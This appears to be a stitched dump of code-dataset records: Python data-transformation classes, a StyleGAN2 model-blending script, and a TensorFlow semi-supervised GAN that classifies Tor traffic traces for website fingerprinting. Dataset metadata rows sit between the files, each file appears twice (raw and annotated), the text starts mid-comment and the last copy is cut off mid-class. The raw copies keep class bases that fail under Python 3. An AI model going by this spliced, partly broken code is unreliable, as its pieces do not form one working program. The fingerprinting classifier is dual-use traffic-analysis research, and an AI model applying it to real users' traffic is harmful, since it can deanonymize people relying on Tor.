# new-style semantics while producing a valid Python-3 linearization.
class MeanStdYTransformation(DataTransformation, object):
    """
    Standardizes Y to zero mean and unit variance using a fitted sklearn
    StandardScaler; X is left untouched.
    """
    def __init__(self, scalar):
        super(MeanStdYTransformation, self).__init__()
        # Fitted sklearn preprocessing.StandardScaler over the training Y.
        self.scalar = scalar
    def transform_X(self, X):
        return X
    def transform_Y(self, Y):
        return self.scalar.transform(Y)
    def untransform_X(self, X):
        return X
    def untransform_Y(self, Y):
        return self.scalar.inverse_transform(Y)
    def untransform_Y_var(self, Yvar):
        # NOTE(review): the variance is returned without rescaling — looks
        # like callers keep variances in the transformed space; confirm.
        return Yvar
    def untransform_NLPD(self, NLPD):
        # Add the log-Jacobian of the standardization per output dimension;
        # the first column appears to hold the total NLPD over all outputs.
        # NOTE(review): `std_` is the legacy StandardScaler attribute
        # (modern sklearn exposes `scale_`) — confirm the pinned version.
        return NLPD + np.hstack((np.array([np.log(self.scalar.std_).sum()]), np.log(self.scalar.std_)))
    @staticmethod
    def get_transformation(Y, X):
        return MeanStdYTransformation(preprocessing.StandardScaler().fit(Y))
# FIX: bases were (object, DataTransformation) — an inconsistent MRO under
# Python 3 (object must come last). Listing `object` last keeps Python-2
# new-style semantics while producing a valid Python-3 linearization.
class MinTransformation(DataTransformation, object):
    """
    Min-max scales the targets only:
        transformed Y = (Y - min(Y)) / (max(Y) - min(Y)) - offset
    X is left untouched.
    """
    def __init__(self, min, max, offset):
        # `min`/`max` shadow the builtins but are kept: the parameter names
        # are part of the public constructor signature.
        super(MinTransformation, self).__init__()
        self.min = min
        self.max = max
        self.offset = offset
    def transform_X(self, X):
        return X
    def transform_Y(self, Y):
        return (Y-self.min).astype('float')/(self.max-self.min) - self.offset
    def untransform_X(self, X):
        return X
    def untransform_Y(self, Y):
        return (Y+self.offset)*(self.max-self.min) + self.min
    def untransform_Y_var(self, Yvar):
        # Variance scales with the square of the linear factor.
        return Yvar * (self.max-self.min) ** 2
    def untransform_NLPD(self, NLPD):
        # log-Jacobian correction of the linear map.
        return NLPD + np.log(self.max - self.min)
    @staticmethod
    def get_transformation(Y, X):
        # offset 0.5 centers the unit-scaled targets around zero.
        return MinTransformation(Y.min(), Y.max(), 0.5)
| 21.63 | 103 | 0.596163 | import numpy as np
from sklearn import preprocessing
class DataTransformation:
def __init__(self):
pass
def transform_X(self, X):
raise NotImplementedError()
def transform_Y(self, Y):
raise NotImplementedError()
def untransform_X(self, X):
raise NotImplementedError()
def untransform_Y(self, Y):
raise NotImplementedError()
def untransform_Y_var(self, Yvar):
raise NotImplementedError()
def untransform_NLPD(self, NLPD):
raise NotImplementedError()
class IdentityTransformation:
def __init__(self):
pass
def transform_X(self, X):
return X
def transform_Y(self, Y):
return Y
def untransform_X(self, X):
return X
def untransform_Y(self, Y):
return Y
def untransform_Y_var(self, Yvar):
return Yvar
@staticmethod
def get_transformation(Y, X):
return IdentityTransformation()
def untransform_NLPD(self, NLPD):
return NLPD
class MeanTransformation(object, DataTransformation):
def __init__(self, mean):
super(MeanTransformation, self).__init__()
self.mean = mean
def transform_X(self, X):
return X
def transform_Y(self, Y):
return Y - self.mean
def untransform_X(self, X):
return X
def untransform_Y(self, Y):
return Y + self.mean
def untransform_Y_var(self, Yvar):
return Yvar
def untransform_NLPD(self, NLPD):
return NLPD
@staticmethod
def get_transformation(Y, X):
return MeanTransformation(Y.mean(axis=0))
class MeanStdYTransformation(object, DataTransformation):
def __init__(self, scalar):
super(MeanStdYTransformation, self).__init__()
self.scalar = scalar
def transform_X(self, X):
return X
def transform_Y(self, Y):
return self.scalar.transform(Y)
def untransform_X(self, X):
return X
def untransform_Y(self, Y):
return self.scalar.inverse_transform(Y)
def untransform_Y_var(self, Yvar):
return Yvar
def untransform_NLPD(self, NLPD):
return NLPD + np.hstack((np.array([np.log(self.scalar.std_).sum()]), np.log(self.scalar.std_)))
@staticmethod
def get_transformation(Y, X):
return MeanStdYTransformation(preprocessing.StandardScaler().fit(Y))
class MinTransformation(object, DataTransformation):
def __init__(self, min, max, offset):
super(MinTransformation, self).__init__()
self.min = min
self.max = max
self.offset = offset
def transform_X(self, X):
return X
def transform_Y(self, Y):
return (Y-self.min).astype('float')/(self.max-self.min) - self.offset
def untransform_X(self, X):
return X
def untransform_Y(self, Y):
return (Y+self.offset)*(self.max-self.min) + self.min
def untransform_Y_var(self, Yvar):
return Yvar * (self.max-self.min) ** 2
def untransform_NLPD(self, NLPD):
return NLPD + np.log(self.max - self.min)
@staticmethod
def get_transformation(Y, X):
return MinTransformation(Y.min(), Y.max(), 0.5)
| true | true |
7900e540ea8e51a95ef1f2f7243500e88e57633b | 2,518 | py | Python | blend.py | jscarlson/stylegan2-pytorch | b460a7378ff3e80ff56190b3225c65e42e37ad6e | [
"MIT",
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | blend.py | jscarlson/stylegan2-pytorch | b460a7378ff3e80ff56190b3225c65e42e37ad6e | [
"MIT",
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | blend.py | jscarlson/stylegan2-pytorch | b460a7378ff3e80ff56190b3225c65e42e37ad6e | [
"MIT",
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | import os
import copy
import numpy as np
import click
from typing import List, Optional
import torch
import pickle
def extract_conv_names(model):
    """Return the parameter names of a state dict, in insertion order.

    :param model: mapping (e.g. a generator state_dict) keyed by layer name
    :return: list of the keys
    """
    # Idiom fix: list(model.keys()) replaces the redundant generator pass.
    return list(model.keys())
def blend_models(low, high, model_res, level):
    """Blend two StyleGAN2 generator state dicts.

    Layers belonging to resolution levels below ``level`` — plus the style
    (mapping) network, the stem conv/to_rgb, the constant input and the
    early noise buffers — keep the weights of ``low``; every other entry
    is cloned from ``high``.

    :param low: state dict supplying the lower-resolution / early layers
    :param high: state dict supplying all remaining layers
    :param model_res: unused; kept for interface compatibility
    :param level: number of leading levels to keep from ``low``
    :return: a new state dict holding the blended weights
    """
    levels = [x for x in range(level)]
    low_names = extract_conv_names(low)
    high_names = extract_conv_names(high)
    # Both models must expose the same parameter names in the same order.
    assert all((x == y for x, y in zip(low_names, high_names)))
    # Start from the lower model and overwrite the layers above the split.
    model_out = copy.deepcopy(low)
    for name in high.keys():
        if any(f'convs.{lvl}' in name for lvl in levels):
            continue
        if any(f'to_rgbs.{lvl // 2}' in name for lvl in levels):
            continue
        if any(f'noises.noise_{lvl}' in name for lvl in levels):
            continue
        if ('style' in name):
            continue
        if ('conv1' in name):
            continue
        if ('to_rgb1' in name):
            continue
        if ('input.input' in name):
            continue
        model_out[name] = high[name].clone()
    return model_out
#----------------------------------------------------------------------------
@click.command()
@click.pass_context
@click.option('--lower_res_pkl', help='Network pickle filename for lower resolutions', required=True)
@click.option('--higher_res_pkl', help='Network pickle filename for higher resolutions', required=True)
@click.option('--output_path','out', help='Network pickle filepath for output', default='./blended.pt')
@click.option('--model_res', type=int, help='Output resolution of model (likely 1024, 512, or 256)', default=64, show_default=True)
@click.option('--split_lvl', type=int, help='Resolution to split model weights', default=4, show_default=True)
def create_blended_model(
    ctx: click.Context,
    lower_res_pkl: str,
    higher_res_pkl: str,
    model_res: Optional[int],
    split_lvl: Optional[int],
    out: Optional[str],
):
    """CLI entry point: blend two generator checkpoints and save the result.

    Loads the EMA generator weights ('g_ema') from both checkpoints on CPU,
    blends them with blend_models at the requested split level, and writes
    the merged state dict to `out`.
    """
    lo_G_ema = torch.load(lower_res_pkl, map_location=torch.device('cpu'))['g_ema']
    hi = torch.load(higher_res_pkl, map_location=torch.device('cpu'))['g_ema']
    model_out = blend_models(lo_G_ema, hi, model_res, split_lvl)
    torch.save(model_out, out)
#----------------------------------------------------------------------------
# Script entry point; click injects the parsed command-line options.
if __name__ == "__main__":
    create_blended_model() # pylint: disable=no-value-for-parameter
#---------------------------------------------------------------------------- | 32.701299 | 131 | 0.603654 | import os
import copy
import numpy as np
import click
from typing import List, Optional
import torch
import pickle
def extract_conv_names(model):
model_names = list(name for name in model.keys())
return model_names
def blend_models(low, high, model_res, level):
levels = [x for x in range(level)]
low_names = extract_conv_names(low)
high_names = extract_conv_names(high)
assert all((x == y for x, y in zip(low_names, high_names)))
model_out = copy.deepcopy(low)
for name in high.keys():
if any(f'convs.{lvl}' in name for lvl in levels):
continue
if any(f'to_rgbs.{lvl // 2}' in name for lvl in levels):
continue
if any(f'noises.noise_{lvl}' in name for lvl in levels):
continue
if ('style' in name):
continue
if ('conv1' in name):
continue
if ('to_rgb1' in name):
continue
if ('input.input' in name):
continue
model_out[name] = high[name].clone()
return model_out
@click.command()
@click.pass_context
@click.option('--lower_res_pkl', help='Network pickle filename for lower resolutions', required=True)
@click.option('--higher_res_pkl', help='Network pickle filename for higher resolutions', required=True)
@click.option('--output_path','out', help='Network pickle filepath for output', default='./blended.pt')
@click.option('--model_res', type=int, help='Output resolution of model (likely 1024, 512, or 256)', default=64, show_default=True)
@click.option('--split_lvl', type=int, help='Resolution to split model weights', default=4, show_default=True)
def create_blended_model(
ctx: click.Context,
lower_res_pkl: str,
higher_res_pkl: str,
model_res: Optional[int],
split_lvl: Optional[int],
out: Optional[str],
):
lo_G_ema = torch.load(lower_res_pkl, map_location=torch.device('cpu'))['g_ema']
hi = torch.load(higher_res_pkl, map_location=torch.device('cpu'))['g_ema']
model_out = blend_models(lo_G_ema, hi, model_res, split_lvl)
torch.save(model_out, out)
if __name__ == "__main__":
create_blended_model()
| true | true |
7900e5869d879e772ede2db438ad55df82aa36fa | 17,454 | py | Python | wfi/cw/wfi-cw5.py | traffic-analysis/gandalf | 7015cdde2765fadd0cb653adea1e2b5dc2a6145e | [
"MIT"
] | 2 | 2021-09-29T05:06:46.000Z | 2021-12-12T19:48:18.000Z | wfi/cw/wfi-cw5.py | traffic-analysis/gandalf | 7015cdde2765fadd0cb653adea1e2b5dc2a6145e | [
"MIT"
] | null | null | null | wfi/cw/wfi-cw5.py | traffic-analysis/gandalf | 7015cdde2765fadd0cb653adea1e2b5dc2a6145e | [
"MIT"
] | null | null | null | import tensorflow as tf
import tensorflow.contrib.distributions as tfd
import numpy as np
import os.path as opth
import tqdm
import os
from sklearn.utils import shuffle
import argparse
# Module-level configuration and shared handles.
HOME = os.path.expanduser('~')  # dataset root: $HOME/datasets/...
os.environ["CUDA_VISIBLE_DEVICES"] = "2";  # pin this job to GPU #2
layers = tf.keras.layers  # shorthand used by the model builders below
parser = argparse.ArgumentParser()  # arguments are registered in __main__
def define_generator():
    """Build the 1-D generator network.

    A latent vector is projected to a length-316 "spatial" axis and refined
    by Conv1D+BatchNorm blocks; the four upsampling blocks double the length
    each time (316 -> 5056 samples), ending in a single-channel tanh output.
    """
    def conv1d_block(filters, upsample=True, activation=tf.nn.relu, index=0):
        # One Conv1D(+BatchNorm) stage, optionally preceded by a 2x
        # upsampling step. Mutates the enclosing `model`.
        if upsample:
            model.add(layers.UpSampling1D(name="UpSampling" + str(index), size=2))
        model.add(layers.Conv1D(filters=filters, kernel_size=5, padding='same', name="Conv1D" + str(index),
                                activation=activation))
        model.add(layers.BatchNormalization())
    model = tf.keras.models.Sequential(name="Generator")
    model.add(layers.Dense(int(316), activation=tf.nn.relu, name="NoiseToSpatial"))
    model.add(layers.BatchNormalization())
    model.add(layers.Reshape((int(316),1)))
    # Four upsampling stages (x16 overall), then refinement at fixed length.
    conv1d_block(filters=512, upsample=True, index=0)
    conv1d_block(filters=512, upsample=True, index=1)
    conv1d_block(filters=256, upsample=True, index=2)
    conv1d_block(filters=256, upsample=True, index=3)
    conv1d_block(filters=128, upsample=False, index=4)
    conv1d_block(filters=128, upsample=False, index=5)
    conv1d_block(filters=64, upsample=False, index=6)
    conv1d_block(filters=64, upsample=False, index=7)
    # Final single-channel projection squashed to [-1, 1].
    conv1d_block(filters=1, upsample=False, activation=tf.nn.tanh, index=8)
    return model
class Discriminator:
    """Conv1D feature extractor ("tail") plus an MLP classifier ("head").

    The tail's flattened activations double as the feature vector used by
    the generator's feature-matching loss; __call__ returns
    (class logits, features).
    """
    def __init__(self):
        self.tail = self._define_tail()  # conv feature extractor
        self.head = self._define_head()  # MLP producing class logits
    def _define_tail(self, name="Discriminator"):
        # Stacked Conv1D + Dropout stages ending in Flatten. The `index`
        # values only affect layer names, not the order layers are added.
        feature_model = tf.keras.models.Sequential(name=name)
        def conv1d_dropout(filters, strides, index=0):
            # One conv + dropout stage; mutates the enclosing `feature_model`.
            suffix = str(index)
            feature_model.add(layers.Conv1D(filters=filters, strides=strides, name="Conv{}".format(suffix), padding='same',
                                            kernel_size=5, activation=tf.nn.leaky_relu))
            feature_model.add(layers.Dropout(name="Dropout{}".format(suffix), rate=0.3))
        conv1d_dropout(filters=32, strides=2, index=5)
        conv1d_dropout(filters=32, strides=2, index=6)
        conv1d_dropout(filters=64, strides=2, index=0)
        conv1d_dropout(filters=64, strides=2, index=1)
        conv1d_dropout(filters=128, strides=2, index=2)
        conv1d_dropout(filters=128, strides=2, index=3)
        conv1d_dropout(filters=256, strides=1, index=4)
        conv1d_dropout(filters=256, strides=1, index=7)
        # The flattened output is the feature layer for the FM loss.
        feature_model.add(layers.Flatten(name="Flatten"))
        return feature_model
    def _define_head(self):
        # Dropout-regularized MLP mapping tail features to class logits.
        # NOTE: reads the module-level `args` parsed in __main__.
        head_model = tf.keras.models.Sequential(name="DiscriminatorHead")
        head_model.add(layers.Dense(units=2048, activation='relu'))
        head_model.add(layers.Dropout(rate=0.5))
        head_model.add(layers.Dense(units=2048, activation='relu'))
        head_model.add(layers.Dropout(rate=0.5))
        head_model.add(layers.Dense(units=1024, activation='relu'))
        head_model.add(layers.Dropout(rate=0.5))
        head_model.add(layers.Dense(units=512, activation='relu'))
        head_model.add(layers.Dropout(rate=0.5))
        head_model.add(layers.Dense(units=args.num_classes, activation=None, name="Logits"))
        return head_model
    @property
    def trainable_variables(self):
        # Union of tail and head variables, used by the D optimizer.
        return self.tail.trainable_variables + self.head.trainable_variables
    def __call__(self, x, *args, **kwargs):
        features = self.tail(x, *args, **kwargs)
        print(features.shape)
        return self.head(features, *args, **kwargs), features
def accuracy(logits, labels):
    """Return a TF op for mean 0/1 accuracy of argmax(logits) vs. int labels."""
    preds = tf.argmax(logits, axis=1)
    return tf.reduce_mean(tf.to_float(tf.equal(preds, labels)))
def main(args):
    """Run one full semi-supervised GAN training (WF-I, closed world).

    Builds the entire TF1 graph — data pipeline, generator, discriminator,
    losses, train ops, summaries — then trains for args.train_epochs epochs,
    tracking the best test accuracy in the module-level `best_acc`.
    """
    global best_acc
    best_acc = 0
    with tf.Graph().as_default():
        print("Input data preprocessing...")
        with tf.name_scope("DataPreprocess"):
            # Train/test ratio 500:100; closed world: 100 monitored classes,
            # 2498 instances each, no unmonitored traffic, 5000-sample traces.
            r_train = 500.0 / 6.0
            r_test = 100.0 / 6.0
            nClass = 100 # 95 # 100
            mon_instance = 2498.0 # 1000.0 # 300.0
            unClass = 0 # 40000 # 30000
            unmon_instance = unClass
            dim = 5000
            with tf.device('/cpu:0'):
                (train_x, train_y, test_x_data, test_y_data) = split_awf_closed(r_train, r_test, nClass, mon_instance,
                                                                                unmon_instance, dim)
            def reshape_and_scale(x, img_shape=(-1, dim, 1)):
                # Despite the name, no scaling happens: reshape + cast only.
                return x.reshape(img_shape).astype(np.float32)
            train_x = reshape_and_scale(train_x)
            test_x_data = reshape_and_scale(test_x_data)
            # AWF2 provides the unlabeled set.
            awf_data2 = np.load (HOME+'/datasets/awf2.npz', allow_pickle=True)
            train_x_unlabeled = awf_data2['data']
            train_y_unlabeled = awf_data2['labels']
            train_x_unlabeled = reshape_and_scale(train_x_unlabeled)
            X, y = shuffle(train_x, train_y)
            print(X.shape)
            print(y.shape)
        print("Setup the input pipeline...")
        with tf.name_scope("InputPipeline"):
            # Keep only `num_labeled_examples` labeled traces per class.
            train_x_labeled, train_y_labeled = [], []
            for i in range(args.num_classes):
                print(i)
                train_x_labeled.append(X[y == i][:args.num_labeled_examples])
                train_y_labeled.append(y[y == i][:args.num_labeled_examples])
            train_x_labeled_data = np.concatenate(train_x_labeled)
            train_y_labeled_data = np.concatenate(train_y_labeled)
            train_x_unlabeled_data = train_x_unlabeled#np.concatenate(train_x_unlabeled)
            train_y_unlabeled_data = train_y_unlabeled#np.concatenate(train_y_unlabeled)
            # Second, independently shuffled view of the unlabeled set; it
            # feeds the generator's feature-matching pass.
            train_x_unlabeled2, train_y_unlabeled2 = shuffle(train_x_unlabeled, train_y_unlabeled)
            train_x_unlabeled2_data = train_x_unlabeled2#np.concatenate(train_x_unlabeled2)
            train_y_unlabeled2_data = train_y_unlabeled2#np.concatenate(train_y_unlabeled2)
            # Placeholders backing the three initializable-iterator pipelines.
            labeled_X = tf.placeholder(tf.float32, shape=[None, dim, 1])
            labeled_y = tf.placeholder(tf.int64, shape=[None])
            unlabeled_X = tf.placeholder(tf.float32, shape=[None, dim, 1])
            unlabeled_y = tf.placeholder(tf.int64, shape=[None])
            unlabeled_X2 = tf.placeholder(tf.float32, shape=[None, dim, 1])
            unlabeled_y2 = tf.placeholder(tf.int64, shape=[None])
            test_X = tf.placeholder(tf.float32, shape=[None, dim, 1])
            test_y = tf.placeholder(tf.int64, shape=[None])
            train_labeled_dataset = tf.data.Dataset.from_tensor_slices((labeled_X, labeled_y)) \
                .shuffle(buffer_size=len(train_x_labeled_data)) \
                .repeat()
            train_labeled_dataset = train_labeled_dataset.batch(args.batch_size)
            iterator_labeled = train_labeled_dataset.make_initializable_iterator()
            traces_lab, labels_lab = iterator_labeled.get_next()
            train_unlabeled_dataset = tf.data.Dataset.from_tensor_slices(
                (unlabeled_X, unlabeled_y, unlabeled_X2, unlabeled_y2)) \
                .shuffle(buffer_size=len(train_x_labeled_data)) \
                .repeat()
            train_unlabeled_dataset = train_unlabeled_dataset.batch(args.batch_size)
            iterator_unlabeled = train_unlabeled_dataset.make_initializable_iterator()
            traces_unl, labels_unl, traces_unl2, labels_unl2 = iterator_unlabeled.get_next()
            test_dataset = tf.data.Dataset.from_tensor_slices((test_X, test_y)) \
                .repeat()
            test_dataset = test_dataset.batch(args.batch_size)
            iterator_test = test_dataset.make_initializable_iterator()
            traces_test, labels_test = iterator_test.get_next()
        with tf.name_scope("BatchSize"):
            batch_size_tensor = tf.shape(traces_lab)[0]
            z, z_perturbed = define_noise(batch_size_tensor,args)
        with tf.name_scope("Generator"):
            g_model = define_generator()
            traces_fake = g_model(z)
            traces_fake_perturbed = g_model(z_perturbed)
        with tf.name_scope("Discriminator") as discriminator_scope:
            # One shared discriminator applied to fake, unlabeled and labeled
            # batches (training=True) plus a training=False pass for metrics.
            d_model = Discriminator()
            logits_fake, features_fake = d_model(traces_fake, training=True)
            logits_fake_perturbed, _ = d_model(traces_fake_perturbed, training=True)
            logits_real_unl, features_real_unl = d_model(traces_unl, training=True)
            logits_real_lab, features_real_lab = d_model(traces_lab, training=True) # 1) For supervised loss
            logits_train, _ = d_model(traces_lab, training=False)
        with tf.name_scope("DiscriminatorLoss"):
            # Supervised cross-entropy on the few labeled traces.
            loss_supervised = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
                labels=labels_lab, logits=logits_real_lab))
            # Unsupervised real-vs-fake term built from the logsumexp of the
            # class logits.
            logits_sum_real = tf.reduce_logsumexp(logits_real_unl, axis=1)
            logits_sum_fake = tf.reduce_logsumexp(logits_fake, axis=1)
            loss_unsupervised = 0.5 * (
                tf.negative(tf.reduce_mean(logits_sum_real)) +
                tf.reduce_mean(tf.nn.softplus(logits_sum_real)) +
                tf.reduce_mean(tf.nn.softplus(logits_sum_fake)))
            loss_d = loss_supervised + loss_unsupervised
            if args.man_reg:
                # Manifold regularization: penalize sensitivity of the fake
                # logits to tiny perturbations of the latent vector.
                loss_d += 1e-3 * tf.nn.l2_loss(logits_fake - logits_fake_perturbed) \
                    / tf.to_float(batch_size_tensor)
        with tf.name_scope("Train") as train_scope:
            # D learns at a quarter of the base learning rate.
            optimizer = tf.train.AdamOptimizer(args.lr * 0.25)
            optimize_d = optimizer.minimize(loss_d, var_list=d_model.trainable_variables)
            train_accuracy_op = accuracy(logits_train, labels_lab)
        with tf.name_scope(discriminator_scope):
            # Re-apply D under a control dependency on its train op so the
            # generator's feature statistics come from the updated weights.
            with tf.control_dependencies([optimize_d]):
                logits_fake, features_fake = d_model(traces_fake, training=True)
                logits_real_unl, features_real_unl = d_model(traces_unl2, training=True)
        with tf.name_scope("GeneratorLoss"):
            feature_mean_real = tf.reduce_mean(features_real_unl, axis=0)
            feature_mean_fake = tf.reduce_mean(features_fake, axis=0)
            # Feature matching: mean absolute difference between the mean
            # real and fake feature vectors.
            loss_g = tf.reduce_mean(tf.abs(feature_mean_real - feature_mean_fake))
        with tf.name_scope(train_scope):
            optimizer = tf.train.AdamOptimizer(args.lr, beta1=0.5)
            train_op = optimizer.minimize(loss_g, var_list=g_model.trainable_variables)
        with tf.name_scope(discriminator_scope):
            with tf.name_scope("Test"):
                logits_test, _ = d_model(traces_test, training=False)
                test_accuracy_op = accuracy(logits_test, labels_test)
        with tf.name_scope("Summaries"):
            summary_op = tf.summary.merge([
                tf.summary.scalar("LossDiscriminator", loss_d),
                tf.summary.scalar("LossGenerator", loss_g),
                tf.summary.scalar("ClassificationAccuracyTrain", train_accuracy_op),
                tf.summary.scalar("ClassificationAccuracyTest", test_accuracy_op)])
        writer = tf.summary.FileWriter(_next_logdir("tensorboard/wfi5_cw"))
        print("Run training...")
        steps_per_epoch = (len(train_x_labeled_data) + len(
            train_x_unlabeled_data)) // args.batch_size
        steps_per_test = test_x_data.shape[0] // args.batch_size
        with tf.Session() as sess:
            sess.run(tf.global_variables_initializer())
            step = 0
            for epoch in range(args.train_epochs):
                losses_d, losses_g, accuracies = [], [], []
                print("Epoch {}".format(epoch))
                pbar = tqdm.trange(steps_per_epoch)
                sess.run(iterator_labeled.initializer,
                         feed_dict={labeled_X: train_x_labeled_data, labeled_y: train_y_labeled_data})
                sess.run(iterator_unlabeled.initializer,
                         feed_dict={unlabeled_X: train_x_unlabeled_data, unlabeled_y: train_y_unlabeled_data,
                                    unlabeled_X2: train_x_unlabeled2_data, unlabeled_y2: train_y_unlabeled2_data})
                sess.run(iterator_test.initializer, feed_dict={test_X: test_x_data, test_y: test_y_data})
                for _ in pbar:
                    # Write summaries every 1000 global steps.
                    if step % 1000 == 0:
                        _, loss_g_batch, loss_d_batch, summ, accuracy_batch = sess.run(
                            [train_op, loss_g, loss_d, summary_op, train_accuracy_op])
                        writer.add_summary(summ, global_step=step)
                    else:
                        _, loss_g_batch, loss_d_batch, accuracy_batch = sess.run(
                            [train_op, loss_g, loss_d, train_accuracy_op])
                    pbar.set_description("Discriminator loss {0:.3f}, Generator loss {1:.3f}"
                                         .format(loss_d_batch, loss_g_batch))
                    losses_d.append(loss_d_batch)
                    losses_g.append(loss_g_batch)
                    accuracies.append(accuracy_batch)
                    step += 1
                print("Discriminator loss: {0:.4f}, Generator loss: {1:.4f}, "
                      "Train accuracy: {2:.4f}"
                      .format(np.mean(losses_d), np.mean(losses_g), np.mean(accuracies)))
                # Full test-set evaluation once per epoch; keep the best.
                accuracies = [sess.run(test_accuracy_op) for _ in range(steps_per_test)]
                if np.mean (accuracies) > best_acc:
                    best_acc = np.mean (accuracies)
                if epoch == (int(args.train_epochs)-1):
                    print ("Test accuracy: {0:.4f}".format (np.mean (accuracies)))
                    print ("Best accuracy: {0:.4f}".format (best_acc))
def define_noise(batch_size_tensor, args):
    """Sample the latent batch z ~ N(0, stddev^2) of shape
    (batch, z_dim_size), plus a copy with a tiny (1e-5-scaled) Gaussian
    perturbation used by the manifold-regularization term."""
    with tf.name_scope("LatentNoiseVector"):
        z = tfd.Normal(loc=0.0, scale=args.stddev).sample(
            sample_shape=(batch_size_tensor, args.z_dim_size))
        z_perturbed = z + tfd.Normal(loc=0.0, scale=args.stddev).sample(
            sample_shape=(batch_size_tensor, args.z_dim_size)) * 1e-5
    return z, z_perturbed
def split_awf_closed(r_train, r_test, nClass, mon_instance, unmon_instance, dim):
    """Load the AWF1 monitored dataset and split it into train/test sets.

    For each of the `nClass` monitored classes, the `mon_instance` traces
    are shuffled once (the same permutation for every class) and split
    train:test according to r_train:r_test. `unmon_instance` is unused in
    this closed-world variant. Assumes awf1.npz stores class c's traces
    contiguously at rows [c*mon_instance, (c+1)*mon_instance).

    :return: (train_feature, train_label, test_feature, test_label) arrays,
             each trace truncated/kept to its first `dim` samples
    """
    mon_data = np.load(HOME+'/datasets/awf1.npz', allow_pickle=True)
    mon_x = mon_data['feature']
    # Uniformly sample instances within each monitored class.
    print('mon_instance',mon_instance)
    print('unmon_instance',unmon_instance)
    num_mtrain_instance = mon_instance * (r_train / (r_train + r_test)) # monitored training instances per class
    mon_random = np.array(range(int(mon_instance)))
    np.random.shuffle(mon_random)
    mon_train_ins = mon_random[:int(num_mtrain_instance)] # ~2081 with the defaults
    mon_test_ins = mon_random[int(num_mtrain_instance):]
    print('mon_test_ins', len(mon_test_ins))
    # Pre-allocate to avoid memory blow-up from repeated concatenation.
    train_feature = np.zeros((nClass*len(mon_train_ins), dim), dtype=int)
    test_feature = np.zeros((nClass*len(mon_test_ins),dim), dtype=int)
    print('test_feature', len(test_feature))
    train_label = np.zeros((nClass*len(mon_train_ins),), dtype=int)
    test_label = np.zeros((nClass*len(mon_test_ins),), dtype=int)
    print(len(mon_train_ins))
    print(len(mon_test_ins))
    i = 0
    mon_instance = int(mon_instance)
    print('Monitored training set partitioning...')
    print(nClass)
    print(len(mon_train_ins))
    for c in range(nClass):
        c=int(c)
        print(c)
        for instance in mon_train_ins:
            train_label[i] = c
            train_feature[i] = mon_x[(c*mon_instance)+instance][:dim]
            i += 1
    print(i)
    print('Monitored testing set partitioning...')
    j = 0
    for c in range(nClass):
        c = int(c)
        for instance in mon_test_ins:
            test_label[j]=c
            test_feature[j]=mon_x[(c*mon_instance)+instance][:dim]
            j += 1
        print(j)
    print(j)
    print('train_feature: ', len(train_feature))
    print('train_label: ', len(train_label))
    print('test_feature: ', len(test_feature))
    print('test_label: ', len(test_label))
    print('train_dim: ', len(train_feature[0]))
    print('test_dim: ', len(test_feature[0]))
    return train_feature, train_label, test_feature, test_label
def _next_logdir(path):
if not os.path.exists(path):
os.makedirs(path)
subdirs = [d for d in os.listdir(path) if opth.isdir(opth.join(path, d))]
logdir = opth.join(path, "run" + str(len(subdirs)).zfill(4))
if not os.path.exists(logdir):
os.makedirs(logdir)
return logdir
if __name__ == "__main__":
    # Training hyper-parameters; all optional with the defaults below.
    parser.add_argument ('--batch_size', required=False, default=32)
    parser.add_argument ('--train_epochs', required=False, default=12)
    parser.add_argument ('--lr', required=False, default=2e-4)
    parser.add_argument ('--stddev', required=False, default=1e-2)  # latent noise std
    parser.add_argument ('--num_classes', required=False, default=100)
    parser.add_argument ('--z_dim_size', required=False, default=100)
    parser.add_argument ('--num_labeled_examples', required=False, default=5)  # labeled traces per class
    parser.add_argument ('--man_reg', required=False, default=True)  # manifold regularization on/off
    args = parser.parse_args ()
    # Repeat the whole experiment five times (fresh graph each run).
    for i in range(5):
        main(args)
import tensorflow.contrib.distributions as tfd
import numpy as np
import os.path as opth
import tqdm
import os
from sklearn.utils import shuffle
import argparse
HOME = os.path.expanduser('~')
os.environ["CUDA_VISIBLE_DEVICES"] = "2";
layers = tf.keras.layers
parser = argparse.ArgumentParser()
def define_generator():
def conv1d_block(filters, upsample=True, activation=tf.nn.relu, index=0):
if upsample:
model.add(layers.UpSampling1D(name="UpSampling" + str(index), size=2))
model.add(layers.Conv1D(filters=filters, kernel_size=5, padding='same', name="Conv1D" + str(index),
activation=activation))
model.add(layers.BatchNormalization())
model = tf.keras.models.Sequential(name="Generator")
model.add(layers.Dense(int(316), activation=tf.nn.relu, name="NoiseToSpatial"))
model.add(layers.BatchNormalization())
model.add(layers.Reshape((int(316),1)))
conv1d_block(filters=512, upsample=True, index=0)
conv1d_block(filters=512, upsample=True, index=1)
conv1d_block(filters=256, upsample=True, index=2)
conv1d_block(filters=256, upsample=True, index=3)
conv1d_block(filters=128, upsample=False, index=4)
conv1d_block(filters=128, upsample=False, index=5)
conv1d_block(filters=64, upsample=False, index=6)
conv1d_block(filters=64, upsample=False, index=7)
conv1d_block(filters=1, upsample=False, activation=tf.nn.tanh, index=8)
return model
class Discriminator:
def __init__(self):
self.tail = self._define_tail()
self.head = self._define_head()
def _define_tail(self, name="Discriminator"):
feature_model = tf.keras.models.Sequential(name=name)
def conv1d_dropout(filters, strides, index=0):
suffix = str(index)
feature_model.add(layers.Conv1D(filters=filters, strides=strides, name="Conv{}".format(suffix), padding='same',
kernel_size=5, activation=tf.nn.leaky_relu))
feature_model.add(layers.Dropout(name="Dropout{}".format(suffix), rate=0.3))
conv1d_dropout(filters=32, strides=2, index=5)
conv1d_dropout(filters=32, strides=2, index=6)
conv1d_dropout(filters=64, strides=2, index=0)
conv1d_dropout(filters=64, strides=2, index=1)
conv1d_dropout(filters=128, strides=2, index=2)
conv1d_dropout(filters=128, strides=2, index=3)
conv1d_dropout(filters=256, strides=1, index=4)
conv1d_dropout(filters=256, strides=1, index=7)
feature_model.add(layers.Flatten(name="Flatten"))
return feature_model
def _define_head(self):
head_model = tf.keras.models.Sequential(name="DiscriminatorHead")
head_model.add(layers.Dense(units=2048, activation='relu'))
head_model.add(layers.Dropout(rate=0.5))
head_model.add(layers.Dense(units=2048, activation='relu'))
head_model.add(layers.Dropout(rate=0.5))
head_model.add(layers.Dense(units=1024, activation='relu'))
head_model.add(layers.Dropout(rate=0.5))
head_model.add(layers.Dense(units=512, activation='relu'))
head_model.add(layers.Dropout(rate=0.5))
